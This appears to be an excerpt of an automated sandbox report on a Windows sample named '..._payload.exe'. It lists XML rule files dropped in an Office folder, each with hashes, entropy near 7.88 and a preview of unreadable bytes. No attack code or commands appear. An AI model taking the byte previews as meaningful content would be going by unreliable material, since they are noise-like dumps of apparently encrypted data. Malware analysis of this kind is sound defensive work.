                                                                                                                          Preview:<?xml.J..>....$t..G2...R..c@..G...Y...=n..v..)X...;M..W.}..L.%.o._!50...%..ku.\.l8....?..ch....w.j....;A.m............De.Vd....[..a..-SRz.vZ+.....<...rVz..S.o^.......$...g.{..N..Z!.&.I.f"...S..|...).....!E3.G...J..R2.....XCGP.b.Y\.....#.%.....7.\^.VB......W.p..GZ&m.8..%.......l...t......h' g.].M.....l%x...m....T..D1........i.{..by....T..r.SJ.a..v.f.......).l_Jt.Hg...7.v..>.@...X.|.....=:..Yd..u..ajMH.........^.C.J..g......i...T.X(y..).8Z&...rV.9.x.[.c.....TR7.....?QD|....^d...H .:.<{".M>K...*..r^. d..W..v..^H..iI.#.].j.W|...L."....-.....C^!vcB...w.^m3..{.i0.I...g.....A..<.......E.-.%'..M.oh......v............P.9......L............3Z......v....o.z..,^.PR...!...0.S......o.v.eReXNr...I...;p.=.c.Nn..}O#..N...s%..t..q.........R.P.;..t..).W......&...*.(.....;.......K.*.."2...z7..?..FwT..../.wy.0$ ,.6.D.b....<.,x..zq.!...R.....?..1L..r...vZ..N.-..q...)Q....$8w....Fa....M....l..of..V0\TX...?]...G......Vq.:.}.l..P5.._~.n\..)

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701101v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1744
                                                                                                                          Entropy (8bit):7.8809298676732435
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:t68kHezxeKYAjpKNV8dL5WpaL1HHqeGqeD:tWez9YA4GL5WZym
                                                                                                                          MD5:DF63E58CC951DDC501100DBDF3C7D475
                                                                                                                          SHA1:D9BD9053C9769014877A55342D0893A10123DA06
                                                                                                                          SHA-256:2310C20BC70B4CDBFF8CB8B2DF1678FE5BBC84DEC242BFD601A7A93EDFD907CA
                                                                                                                          SHA-512:BD449EFCC427F899A4BFC64741173EC0EB4D644B60C98DC2B835827AD055DF21942B9F1198534AB3CB0079B42045DB791C0D6DC56DF113E64C05EBD9237D3421
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...A.+;9.w...f.T..=Hs..$...(kW*l.V.J.J=i..Y...S..Z..<.....l..[X..lR.Q..(:[.x7.;J.......X.. :Og......!.6.j/p|.V......E?.-(.D.g{......=Cy)C.w./.....|....0>..fW.-.t...&.k..._....T..la......P./pOE=.l.p.}Z...2.:.:...|.H.U9.8...W.:....s;aP..lI.<..a..TF..*..AlqC.O..*..;y.H.wC..5......c..:`..BY.......R.O8..P&..x.!.R.....}.Qp.A/v.U...".D..j.T...GaW..L..V.P....s3.;....|?.J..mXt.)2........[.Q@.g..HHt.....).....(:BT.}.=.-.v..Ae.._(....L}%LX".,.....^...~..j......FSm/..@..3..?...`...5..,8.....J.f&...@4S;.......Bp.v...9....F.Q..c.?...E.......j.....s...).G.N.JO.Zt.....j.h..|..)....f.T....&...8....O.....W..#%........N.3...vQ..G...N............V...f.}...(....M....Po./..Y9.sA.3H...t...].I..n=Co..y.emk(:).P..9.BQV..p.......%<.........4!.F..xAR..0#.x.m33s^.bd.....d....k..Mmr.yn....A$..^...AA6 ....a.e1.OS;D@.7W3.fS.8#....#.4.0..ZQ..........=.L./..&$..y.cN...x/9.e.hz..jj..t{.3...Ad...G....>...Ru...a........H.MO.X..!.c..........k..f..l...9a.4....Fqn.1...H....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.873062673774371
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:NeIFHKUa69ZRXU7v+lyCi0jMI360ZppsRD:9FHK56ZM90HrsZ
                                                                                                                          MD5:5A5CD0FBB7BB1E1FA60C0C27A24FDDE7
                                                                                                                          SHA1:2AF4C0BC1DFF343B0EF71F9ADF5410603693F51B
                                                                                                                          SHA-256:D3032BF75B507827461F821C8B8BD6257D027204E55DA0AD809D8FAF7F4E46AF
                                                                                                                          SHA-512:90A2F1FAE2AE2C60D44F3F4E31ABBEC640ABC5EFE28BAF4246045765817D33C5C8CBFF6DFC50EC41878806442E91448F6E5905F3AFA6F9C015DA8606566EBA89
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..J.d.iy..}..v.D.f.Z....u.....+j.......K.# .%..3...P>Ye.Q...m.E.i...r..~ .|.tB..^.~. .I.v.~t..A>,#G.U..4e.q\.........@..... ......M.BI.. ...&...I........ G......).....Z+:..B....m0G.^[[\C.......4p.y.~pd...i.4..~..M...3A...!.....v+W..K..e&.mf....kE".....-2..x.@...P...h..0.t..../..H.....;}-...8.....M.....J....&5=.Fn.T.~w...3}.....9fu.1<c..o..............Q!N.$R.n...U..u6."du..1<.........".S=..]\Y>.??`!;..(..J35.chd'..y.&s....1J......H.....*..U.u..B.h..O.. @N.......Y........P...d.....#......6.+?....)Y0X.........<..}..0q...SZ._R...B.....P.{.....l.i._.0.." ...."............F..y8fA<..jZfvZ..L..$:.U......n.Rb.'Y.;.h..Fas.zp....;.f......5c.>....@.I..}5.8.&...[.G,..P.).H....'.|......(..Tw..:..t.F.A..O..M..<.o......91Z........sc..).. .q.wD..b:/.=.........x>.Z.T.&..22{Cjj1.<....g .&.S..XN..<.(.x...+.?fp|....u....Dy.S.bn.......X.....b..w'....EY.....4....H7..c{.....\>...g...f.*..V.Y....TA.....[&.^BX{l.8...:..3.2...P.....Y..5kvx..$.xG...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701151v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1734
                                                                                                                          Entropy (8bit):7.8818851078402705
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:I9wvnki2HtqZqWG8QhUIKFW+GLCdhKm7VHYVxAvWnTa5Howv/yeQdkgGavEde9r+:28ZbqWG8DIGW+84PYyEEowvT89rKSAD
                                                                                                                          MD5:A0FA64C65E753C64434AC52A367BF7DF
                                                                                                                          SHA1:13AD2A1AB224280FB6AD4120D150D6DDE6EDD123
                                                                                                                          SHA-256:B725923D4562774FF51DF6D4D28311F78B4335AD1049D1EBC68F8F550F07FB3B
                                                                                                                          SHA-512:71EF86812709C1598CC8CD63A1836F112FDD3BB0D576F50BD1FFA2BF37EE75538C17E618CAD9ACBBCC009602184BE7A35DB68F810B5873A4C623B354606C9C0D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmluj.......... .O.^Kj..w.6..,..f...Ls..v/....C;@K.H.Z.l%..\.E...,O......U...s..{...IphW#..v...f..pG..Nk.....s.F.0.H..2...o......"......2.E.N..yUS.I..x....0..z..h.R..r>..P..tE(.wU...V..".......t.d.!..p.....1.."ED'e.........p.......N<p.\y..h.....O....4..f:bT.k.....e.S...*.....%..D.f..Y,..6|.5z.#`.=.P......h.J4.....F.......f......?u..r..B8h.H....tn..v.,:@.....Z".R.....AT...X.Y.....a..Bm...G..W...~q.#OW.Z%.}....k?....x.u[...R.......+.X.m.J.^Bq..x.h.xx..-V~q...e........M.q..~.V....s.ucd.?.(..#....ll.S.....(..9.3.j.c..b..X.n...Yy%....`..P.j.H.W(..)HAO.5.. ^..o..kU.*.7.....,c...P...`^.........j./.6...Y...n..W.d....g..1.w.....G.qU]47X.Y..9....l..er.R.....Xx...6...J..... .............O..K../........f.k.W..C......T.~....B_f...@....%.};q<l..A....zWR..3.....:T..<))..w.A. ..O3k.K(..2l.-g."....K%.S...[B.,uC.L../..........v."Z.......`.!v.)w.`n.*u@.....`.h.m..u.Qk^.../....Rl...."..\.......4.5..}C0.6TmR.s.%.6v.v..Z.B.p.A....n..3.1....2.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701200v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1689
                                                                                                                          Entropy (8bit):7.887407463034677
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YosoipJpk5aTHlvYAS0N7JnQGOf5937o2LB0y/SyP6BVLQoNvZMjT/WKwOWbMbD:2pJWATFvSahOR9c2LWVEoNOPuK9IGD
                                                                                                                          MD5:96A26407AF609E3437413AB9E78B949A
                                                                                                                          SHA1:7D73A762CBDE0F3C72308C6014DDB4B29548C554
                                                                                                                          SHA-256:08C5788CE15FD2BB5B010512FEDC5666B99BD0B1E0A41623B3F81C5E391EBEAD
                                                                                                                          SHA-512:090A1EC606608ED0D2AC7EEF88504D66EC0D7E9E41D38630A38F7DF910542097F0D8C3117F78037DB0C85359EB9686732DB5692853F0E8648C0CC2F22ECE0B30
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml%.v..t....V.r....'g%)q.f..x?..B9F.TPk....9.Q............/.....%...>ER....G.**..M..$.zVUD...BT.o....jK7.9.3m..-.4G |.f<.r.X.......m...#)C.$..9.hz..Y.{.............L.......^40..3....I.b..y....t.,..z.|.ET........]...i..7.2...Zz..;.M..][.M.:..P _K...A..8.->......I..|4Aw.1.d/........j.;n!^..I.9..]L&.L.6..)..)...._o.YA}.8.*.....-...L-.>{.h..O..-...5.l6.?+....lb....]...[..M.......^.U`.-.>..P..;<:....@....GL.@dO...bmq ..eg,....=.V.(y....9.p.0.6..V.0.K..0B..!c.C.Uh."C].o(..j..+78..rQ...2...V.........[..=n..C.V.>.V..:..j.....Z1...9.LnY...\..Y..K... VY5:bw...Q).(.7...!..`BK...(..7`....h.;....p..k}.A......M......b..&.(.. E.B......q.'?.}.P[..[ZS.....p+u..N;F...4..k\._..gPu...]..4..D.q.lSG*.7.a..BU...O...."..~. ......g.yD..*k.`....rtT.._8.Fix.$;..1.S...x9......Q.....W.P..^...._:.L.m.M.z.G..V....}K..*..ud....N..b..32..[*.o...ru..t....3..h:..\..7.h,X.n.rLD.........A.,..T;v..}...u$..u.a. .*.....4|.V*..7..s\.QX...Q ..H.0....l._.... .......V.|H......+

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701201v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1726
                                                                                                                          Entropy (8bit):7.88209193882281
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:64BGuRWHGvZH7TIJXTS5rtEIDR7aE3SqfCD:6oxWkdT2Ts1DIE3S3
                                                                                                                          MD5:D3A2ADF2C370B1EC54D9DD304218B810
                                                                                                                          SHA1:F4F5FF682EE0AC8D27EB786348B944BF5972722B
                                                                                                                          SHA-256:A41505FD44CD0B5D68EB3B6BE7D718117EF722118F2A069F0BDEB0BEEA48381A
                                                                                                                          SHA-512:FD873679FAFDAD16701133B33720A5C246F461C610C1DA00051365DBE8AC1C2B5D84B3E16BB9FAC61CC7BC2CFE78E110779C0D76A93CBE278365C460725CD364
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.\a!O..b.p].[>....%.....L.[..qv<...._s......&.........X....../d........Z......h.;;|.%.z...GR..2_.eM...D...).e..M.....`..N..^)..h.&..VvG......i.."..>...5=... q.o...L.+.\....C`.n...B.#y.4.I@C.!!..sD.b...t.I..w'.....b.]Fo./........i=...`.2.......2e...n.6P.w.%y+.Z.!...ia..T.A..\......!...3l\..A..@,.!.[.^......7.2.*..pj.io9..*X.%Ee-.8.#...>Q}I..}...;%.g.(\pH.M..z....DnR<ln.n..A..rR8..:..Z.G....%{(..i..`.'t@...HV1XCG.jNy.....^?...Xs.....}.....:6i...3.\..5.d.5$Y..........z0_7.-........;...(EI.?D!!Cyr...y.#.l.#...Y..q8.... ..qp...=.+.XF$.i....I..n8...).!a.q....k..4W.]..)...(Ic..z\...FB. C...n.^...*.z....k?)........a.@t`c.......<.W. p.]40.:f.~..?z..hHLI{........2...).6.P..x.........8...4...T.j.6..........". R.9..w...\.c(.t.."v4.fHVn.<.........w.M.a.r.........+.....#.R@..O.....'.v.K|$O..%..0.."f.G.7..o..]~.L...Q.7.R3..../..!..T.z.[.....Q6.:\.&..I.J....5F}G../.x.H.G--.@^,l._..s.\...[L.%..-.'s.9._.I..vu.mD..f.l...N....UTX..U4..%..V.Hha.X.RT1#

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701250v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1691
                                                                                                                          Entropy (8bit):7.8767638529427915
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:It8oPQ/QFF62v2DUOAkjmN+a3kxO+30bg1MOAF/6noJgt4WU/bG5jK3RHEsfTZeX:IhPO3hAj+I7bg1MOi/VJ7bKK3RHEsfCD
                                                                                                                          MD5:0CAAA6C964B2BA5955EB979334861577
                                                                                                                          SHA1:6D73FC997BFE7FB878CAFA9244CFDA78E69A67F1
                                                                                                                          SHA-256:441A6CB85EBC781FB81B7B21EE3CE041852389EBDF088FF5BA428C788ABDE105
                                                                                                                          SHA-512:6765FE4442C6FCEC31EAC0811559DD9AFFC45FDA1F52549E85ED8847262CFFE8672002D13C1DCECEADBC09454CFC9EB0F7AC51CEE940CCE03FD8DB94EF702275
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..,%.......S......;..P..W.{}K..,&....<k.....&...g.....Jw.).....^.8`....0.X.{.....S.m....,n#.L....\+.q..2..hwv.....4Ikp.4..........X$......9..:..../Q].k..J5.s.;r.:,).....nHn$........T@......+. .....'..#....*6B......c....~.).G......^.<.1$...X...J......ae...13......K...b.......>".Y...."..G.'......{{.:.....x..j..g.r...A......@.g.P.M.i._ ........xh.W.A)...a2..|{..../Zq.%.".1.......IO..R..}......=Jk.9.o.f.e.f.h&........0.*\.'..:um/;...4-....sJ=a.vY....9..iM.....P.S...t.t..,..H.:h,.7...KuX\....H..5........R..?.jU.RI6.xr0#.]..>..:.#.....>.O......e....N.....Y.n.*...W.gF......'G.....2..S..t,j6Q..>.._1...C...x7D..Z.Q.e/...../H-P.d.0..!..........j.>.E^.gN..~m.`.V/P..X[Dd..#./.U3.?U..(./PI.m..L5....>S.{.8XG..{.../3..].. @.....S.vlsU...E..T.......B5..&L......%8*9R,..G..V..y..P.|^jBFX..2.h.J..@..S.PO.. ..D...[e.8..b..*S%'W.n.k..b..Q......e.gn....DA...RV%C.Z...k(.O-A..M:..2Q.....5.\.....QWx.._."..WR.#.t....1...j.Rn..+.,.%...#................A.....M...i

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701251v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1728
                                                                                                                          Entropy (8bit):7.891480350468292
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:g0YVHIeEGULVXibiHrMs+7OwtMhF5Adth9YezE43X3D:g7IeEhhXiwIsXwtMhF5AxJ
                                                                                                                          MD5:B8B4E8DCB051A87A2EB0C373A4557F85
                                                                                                                          SHA1:C5A5C845BE111B0801DE05F68B25E5C665C569D0
                                                                                                                          SHA-256:088584386D81943645331666B34D5A4FDE1E2B80FF7B93331EA1F7FD244759E9
                                                                                                                          SHA-512:118EAEDB9A15D792BE108141E7971C9237FAF263367F64AB0A90272B79D2C31B7391FF043E86771BDBF6A048CC8010F496F353027C397B0CB6BBF7E4407DF96E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...T.g,~.{a5P......;..I\....i.....+..2..."....b!..|...3..@L~Bar8I..Tb:p.....[...-....$$..:..y;..N....Q...HDJ...CdH.4uuh.&..k.Z.dn...n#...!f.}^*#...M..$...C..Y.5..Xyc.......\u{".l%.......&.b..P....bi...A../.t..W..l..0."E.9.2.s."..j........;.4".-.rp.%..-@4!.!...a%.v.a...R..B0.....p....lSa..zJ..?=...zN.R...p.....u.._.7B....Ad..k.p...+.\....j..!ZE.!.:.w>V..6.`..nL...p...5H.g...6yO.O..j.x.,..P..|u.g{(&]4..&...{.a.|...fP....OIG."qP..U.{.+.[.7....h..K.YX..%..R.!Is.....y.K..Aj^....g..Z. $B.^2.....d@m...J..I..o....u.^..af.2..y...l...)R...../.).!3c..`.4_.6c..m..~.1. ..+....}..`.w&P%a..'(..R]..k..h.~...`=.P....vDLp9u3.......&+.Rl'.:.a..l8.7.%.d.m..V....r.B....D...n#..Z.. ...i.".Kb.n,J.d4.T....T..l.{..a..r.....W"r.j.2.S#.0.....f[<...2.>...K..g0...L...}<..4..(S.a.b.....m%**..|e.zM..<'0...p..{Q..o.....4;.B.y./..[..L....M.A.<.uM..E.?...l.9..q...PY.Gw.pT..-!.2Dbh..a..%.'5.>..N.c&E....x.dU.vl.d..{cG.c8.. ;.L%....<..[./.....D.6.=.-......H.-..M.]".:...7.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701300v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1699
                                                                                                                          Entropy (8bit):7.889942839017678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:iO2uKHvdaVxXw6W+ld5vDu3YSk1pbD635Qnlwh8D:mHVaVhwIdUor1xY4
                                                                                                                          MD5:BA662868BA693A25993C0EFA9977BB6E
                                                                                                                          SHA1:0FFEADD4E0247EEE11EC77D47BB20ABFF3C5A76C
                                                                                                                          SHA-256:EE0581878FA435F0189E14D319652F63F46F58F25236932D9C2FE338876C4150
                                                                                                                          SHA-512:26400FC3A059118A0A3CB57B9470A8EE352ADFECCD474D6E16F4910FE9BA5D994F2D972B68D0991AFBD27FC7BB9AE79C389A0454EE37C3409BF2411183E1A25E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.t....{...9.~....R.!..6.;..6.6J-X...........{...y.Y..K....Z..)y"....,.N.....w...L.G.'a....dd........El.kZ.B.L....By+m.......=.Q..c4.d2.B..<...9v...:Y.>..wE.....!...?.M"...G.gG9.?w.2C(..z...PRF-..]..3..(...........&.W..Vk..B..[kr.........`.....=.J..]3eD..Sx.......W.3n(|.0rn....6..x..hQ"5..!G,T..+B.....0.LS.i].a9..sJ0.h}....%.S.%W...R.cG.U...ly..f.3'.....p..!.....R^..m..V..Eh......M...WX..I.....R2...K...........=B.{+..]..12og.R.......a..c...."...,O...6.2U&..T.N.............,.Z.2.-.KRs....z..%-.+..b.Yf...(c.%..F...X..T.b+.CW.V.'../EL...O.#b]>.f.C.ZX0@.H.q.?.~..u...)<...../_..G...J..@j......P_..b+...y..=n..i..F.v.nQ@b...._f......1.#.....|..;3...+..n..G..z..i...N....Z .}.=..e....A..p2.ZJi.Y....E....h.[..l.....E..@..r0.K.:..V.].o.xc...F.Y</...vQ..?./.6....O`m.....8..@5^?<.-0.o`h...q.}.Us...C..../g@t.Q...`.YtP.t....\..#...Qw..X..=.?...N\..1.~..t.....l.d.<=..q.........g.(...A.n....).]Y.x.....)H"...:.;..3.*Z...F....M.S.....h.$

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701301v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1736
                                                                                                                          Entropy (8bit):7.871987714527701
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zzJYumY4S+FNw/X6n3g9IYfwej4ejc1iTW2H0RzD:zpDgwDfVjN41+D+f
                                                                                                                          MD5:D2D215CEDCF905C2F9D8E4AA9708A7E4
                                                                                                                          SHA1:06E23E6B3851BD22E0FAC4688348CDB0E255C9CC
                                                                                                                          SHA-256:3E70D9672DEA45875DA73020C91E99AB0DF1DD57C932C32DFD18E902658443A3
                                                                                                                          SHA-512:05D94C00AB69900BB7C869DA087256160660CAC48610F2E69D389AD9BCDF0960504FBCB391A0AFDF079B8D228C2717720779A62477B3931CAC343CC72A3EE697
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...".....YfX8.R.T1IDv.xkM...dm/6.k...Gb.k.B.{f.%........l.v..J."i. ..O.`R.......b....VY.-..<:.,y...m....=.2..<...2i..d...........m.F......4.Y.2.Ox%.....8././.........;..O;C.DO.........6...*j..2.....t....>^....=H-.\....K...WF.4...kG.A..S.D.n<...7:........8.......}....s.....F.,..%.9..M.<.]..@.=......l.U.{..ERD.D.T......-...5 ..;.=!&...d!..n.Fdg......M...F...... K....|.-......m.......t2.+b..'...).E).hS....g..V...J.n..h.q...;...g....l.4..jW.........A.7l.^.Q.tx+.q..|"~.....A&..y`.M.:.......RT.....). ...h..p.}.s[..m.P.b.a\..z..d......%9.$y[Y......*.8..>`..p...q.}.&]..LF..g.....SV..f.-..1.|....@...&.......`...A&.u.......Gw>\..mz...6.....}V.X}wm #'.aE.BAg..x.&...9o....}.[.z.....o.f. ...iO...Y.z.g......^......m....J|q....@...i.B..|.......m.~..........z....Kj~S.k....}M..;.4.GS.....{K..j..x `.r'..+I..Xr..s..p..;..D6/..hv.....)..`2Kp.,dD...n.D..M.<..@'.O.;...LF.4,..r.*..}.~.....B. .-..".....^.9.TA...`s?...g\[...............@...A.....k.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701350v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1703
                                                                                                                          Entropy (8bit):7.872209797526836
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:OIbOB6m4TlsSdbXNEl+dbR5SRK1vRMy7D:OUzWSdbml+dbvS+T
                                                                                                                          MD5:0B283A166C3E0518D252D87294B9014E
                                                                                                                          SHA1:F10CA5F35D0DEF932D76365C3E3DF87B8DAE8626
                                                                                                                          SHA-256:34AA061C345BD7F23717F97FA78BED50009C23287E69199A86A602B959CB8B4E
                                                                                                                          SHA-512:DA88DBC37EDA290824F25A19CB9D240B7FEF7A53CC64BDF602305090999BC7189C6C52CF070E7FDD2DCB963EA2A6040DB4CDF2A4F59D9AB16D05DF0275230211
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml2...P...R..R.j...YQ.v..%e..C.........=~...........9.$.p.......#f'..p.3L?ik.....uK.<.v.....+.M.......k.qr.T.'.3s.,...v&d.D.Wp......+_\q..x......*.Q....l'.Q.......D..F....#..?.Y@.....W..\.K.1Y..G...S..f~........y.F.L...?hA..2.!f4c.6.F..p@........C./._`..M..)`^.....LXC.......m.'.!..........#Fb.t.{...8Ia.S=i...;..o..!.T[....3.c.... .'...3..Q.....W'.I?v....,64.sW....@*.G7!8...[....H..r......-z..}.....<J..E..C.9..@...Wk...ck...d..9un@.D.....@X2V.d..H......./...b.]..(>.dv..(M.Uh.svIb~Y.......N.._]..~\.IG. .k./.+.j.YZb....V4....WD7...nT_Z....Pu..R.cv.E......@...^uc.(......T(....1...e.C.....2R')oe..:....../...~.....J..P...C...........'8....~>KV].8.5..An.uy.@..R.Z.G{.0H.I...o.!^..0#4..f..R(..5........O<....o$.......m..m...0s..`R....<=...J..8.W.......&...;.t.$.I=...sHu..W.w..!.(..X.U...b.ol...j9.<6...g.NU..kT_..... ..G....(Sz.^..qG~.p1..g......S.n,m,4.......v..;?.....3.o.PtPI..0.....E=..vN..n... ...Z...@. .t....).m..{.../H7..#J....w.6.=t..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701351v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1740
                                                                                                                          Entropy (8bit):7.869522719161163
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:Tdvan09T5mYCWLhIR2Ws0GGO+PhF2eVfOj4MdD:5van0lTZTj7wWqfml
                                                                                                                          MD5:F1071CCDF24972AAC5DC3139D80B42C5
                                                                                                                          SHA1:68404CA819CA91A3B1F18BB55F731FAB409BDCD6
                                                                                                                          SHA-256:7D145F2F5CA7D94D4D0B0410793DB78CCFE485077CD6ACA608C70DB0F4CC4EED
                                                                                                                          SHA-512:DBAA8117B005D62B0D13DA87CEDBC536A637B8A932F68AD5385866A75A47845B4B6C97E9423000A7CB11D20C8A516A62F22E30886ACEF1D28980E40307DEB14B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml|c..X...9.I...y...Z..^.$.Rg?0..\%..n.8..3.~.@.<..9...J>C....O....o...%8..x...*nG.].....h.p..3Z......31.K.k..l...v@.`[...H.n....Sz6k.y.G....,.....,....m4._.......v.p~........S.6.U~R.hM..nq.....,.......I.Y.B.y._.\..6......o.~.r.....{.0.....5N..X.n.R e0EVrV.R......f.5}.k..k.........;......z.7..MH_;R..."..2.....k.R...MNNtG..pn.[x..A.=.%..5.j.....^....g....;..]......aM.......%.k..4G...w.@..'.......p.t......;0.......Ok./M .....q..z.(.-......O5....*..F......N......A.7Y.5.....9.a.G97.J|9..G.....@...jC..=..98$.F.u%2...'..m...uZ...s3....0]....kq..:}.........f.t2i:...o.J...'7..+.$2..[f.F..{Z6.$..d.{..#..7......E.!L...XlF]w...,.>..%z@*...w..n...}^x.xkH...^.......mf.*A.q.&..."..,TJ6.k..kP,p.!.s.>.D4.P;.(cXP.!..Q.....A1D...=.!.d....J.fr4...5.-.$.....IrW...#../.l9.;`..J3G...Z..+...!.jpx-M....E..d.VYU..D..&m).Y..*.~.Y:|b;l..z.....U..8~Aq....'z..m.0.xrZ+c._.V.e.....Y^....^H.x.]....E.]......AA,.<....../`..2E.9......#...h.........>w.<.....z.n.$.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701400v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1697
                                                                                                                          Entropy (8bit):7.878655790141271
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:nhG+n2DbtNOwehv2QZmLaSEV5Ie2TFm4D:w+WqFhOWVSE6Tkk
                                                                                                                          MD5:F103996B855437C38FE9775F9CC685AA
                                                                                                                          SHA1:E4AF74FBE696962316AEEF1B65285CA15224A662
                                                                                                                          SHA-256:D4D8B90D3B328004BC780899B73E4D109859C9558554C9BB020ADAED96491E17
                                                                                                                          SHA-512:F08DCAA4DC72D0C8F65E66903177DC08F0248DFABEA9C14DA7996DB2BB8451F860FAAE71265D839AB63472AA6DC8854198C7DB3559FE26906D32EEEC81D7AE63
                                                                                                                          Malicious:false
